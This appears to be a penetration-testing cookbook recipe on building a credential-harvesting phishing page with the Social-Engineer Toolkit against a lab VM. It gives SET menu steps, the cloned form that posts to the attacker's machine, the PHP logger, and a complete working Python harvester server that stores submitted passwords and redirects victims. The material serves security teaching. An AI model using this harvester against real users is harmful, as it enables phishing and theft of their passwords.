Creating a password harvester with SET

Social engineering attacks can be considered a special kind of client-side attack. In such attacks, the attacker has to convince the user that the attacker is a trustworthy counterpart who is authorized to receive the information the user has.

SET, the Social-Engineer Toolkit (https://www.trustedsec.com/social-engineer-toolkit/), is a set of tools designed to perform attacks against the human element: spear-phishing, mass e-mails, SMS, rogue wireless access points, malicious websites, infected media, and so on.

In this recipe, we will use SET to create a password harvester web page, look at how it works, and see how attackers use it to steal users' passwords.

How to do it...

  1. In a terminal, write the following command as root:
    setoolkit
    
  2. At the set> prompt, type 1 (for Social-Engineering Attacks) and hit Enter.
  3. Now select Website Attack Vectors (option 2).
  4. From the following menu, we will use the Credential Harvester Attack Method (option 3).
  5. Then select the Site Cloner (option 2).
  6. It will ask for the IP address for the POST back in Harvester/Tabnabbing, which is the IP address the harvested credentials will be sent to. Here, we write the IP of our Kali machine in the host-only network (vboxnet0): 192.168.56.1.
  7. Next, it will ask for the URL to clone; we will clone Peruggia's login page from our vulnerable_vm, so write http://192.168.56.102/peruggia/index.php?action=login.
  8. Now the cloning process will start; after that, you will be asked whether SET should start the Apache server. Let's say yes this time; write y and hit Enter.
  9. Hit Enter again.
  10. Let's test our page: go to http://192.168.56.1/.

    Now we have an exact copy of the original login.

  11. Now, enter a username and password and click on Login. We will try harvester/test.
  12. You will see that the page redirects to the original login page. Now, open a terminal and go to the directory where the harvester file is saved; by default it is /var/www/html on your Kali Linux:
    cd /var/www/html
    
  13. There should be a file named harvester_{date and time}.txt
  14. Display its contents and we will see all the information captured (the name contains a space, so it has to be quoted):
    cat "harvester_2015-11-22 23:16:24.182192.txt"
    

    And that's it; we just need to send the link to our target users so that they visit our fake login page and we harvest their passwords.

How it works...

SET creates three files when it clones a site. The first is index.html, a copy of the original page that contains the login form, with the form's original action replaced by the URL of our Kali machine. If we look at the code of the index.html file that SET created in /var/www/html on our Kali machine, we will find the following:

<form action="http://192.168.56.1/post.php" method=post>
<br>
Username: <input type=text name=username><br>
Password: <input type=password name=password><br>
<br><input type=submit value=Login><br>
</form>

Here, we can see that the username and password will be sent to post.php on 192.168.56.1 (our Kali machine) when submitted; post.php is the second file that SET creates. All this file does is read the contents of the POST request and append them to a harvester_{date and time}.txt file, the third file created by SET and the one that stores the information submitted by users. After writing the data to the file, the <meta> tag redirects the browser to the original login page, so the user will think they mistyped their username or password. Note that the harvester file lives in the web root, so Apache will serve it to anyone who requests its name; on a real engagement, move or delete it as soon as the campaign ends:

<?php
$file = 'harvester_2015-11-22 23:16:24.182192.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
<meta http-equiv="refresh" content="0; url=http://192.168.56.102/peruggia/index.php?action=login" />
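To make the three-file mechanism concrete, here is a self-contained re-implementation of the harvester in Python. It is an added example, not code from SET or from the recipe: it rewrites the form action the way the Site Cloner does, appends each POST to a harvester_{date and time}.txt log in the same print_r layout SET produces, and answers with the same <meta> refresh to the original Peruggia login. The cloned page below is a constructed stand-in for the real clone, HARVEST_DIR is an assumed directory outside the web root (SET writes into /var/www/html), and the listening address is an assumption for a local test.

```python
"""Minimal credential harvester: cloned form -> post handler -> harvester_*.txt.

Added example; not SET's code.  HARVEST_DIR and the listening address are
assumptions, and CLONED_PAGE is a constructed stand-in for the cloned page.
"""
import re
import tempfile
from datetime import datetime
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.parse import parse_qs

# Original login page from the recipe: the victim is bounced back here.
ORIGINAL_LOGIN = "http://192.168.56.102/peruggia/index.php?action=login"
# Assumption: keep the log outside the web root so it cannot be downloaded.
HARVEST_DIR = Path(tempfile.gettempdir()) / "harvest_demo"

# Constructed stand-in for the cloned Peruggia page (same form fields).
CLONED_PAGE = """<html><body>
<form action="http://192.168.56.102/peruggia/index.php?action=login&amp;check=1" method=post>
Username: <input type=text name=username><br>
Password: <input type=password name=password><br>
<input type=submit value=Login>
</form></body></html>"""


def rewrite_form_action(html, post_url):
    """What the Site Cloner does: point every <form action=...> at our post handler."""
    pattern = r'(<form\b[^>]*?\baction=)(["\'])[^"\']*\2'
    return re.sub(pattern, lambda m: f'{m.group(1)}"{post_url}"', html, flags=re.I)


def harvester_filename(now):
    """SET's naming scheme; the space in it is why the name must be quoted in a shell."""
    return f"harvester_{now.strftime('%Y-%m-%d %H:%M:%S.%f')}.txt"


def format_post(fields):
    """Mimic PHP's print_r($_POST, true) so the log looks like SET's."""
    lines = ["Array", "("]
    lines += [f"    [{key}] => {value}" for key, value in fields.items()]
    lines += [")", ""]
    return "\n".join(lines)


def record_post(body, log_path):
    """post.php's job: decode the POST body, append it to the log, build the redirect page."""
    fields = {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}
    log_path.parent.mkdir(parents=True, exist_ok=True)
    with open(log_path, "a") as log:
        log.write(format_post(fields))
    redirect = f'<meta http-equiv="refresh" content="0; url={ORIGINAL_LOGIN}" />'
    return fields, redirect


class Harvester(BaseHTTPRequestHandler):
    """GET serves the rewritten clone; POST plays the role of post.php."""
    post_url = "http://127.0.0.1:8080/post.php"  # assumption: local demo address
    page = rewrite_form_action(CLONED_PAGE, post_url)
    log_path = HARVEST_DIR / harvester_filename(datetime.now())

    def do_GET(self):
        self._send(200, self.page)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        _, redirect = record_post(self.rfile.read(length), self.log_path)
        self._send(200, redirect)

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    # Browse to http://127.0.0.1:8080/, submit harvester/test, then read the log.
    print(f"logging to {Harvester.log_path}")
    HTTPServer(("127.0.0.1", 8080), Harvester).serve_forever()
```

The only behavioural difference from SET is where the log lands: SET's post.php writes next to itself in /var/www/html, which is served by Apache, while this example writes to a directory the web server does not expose.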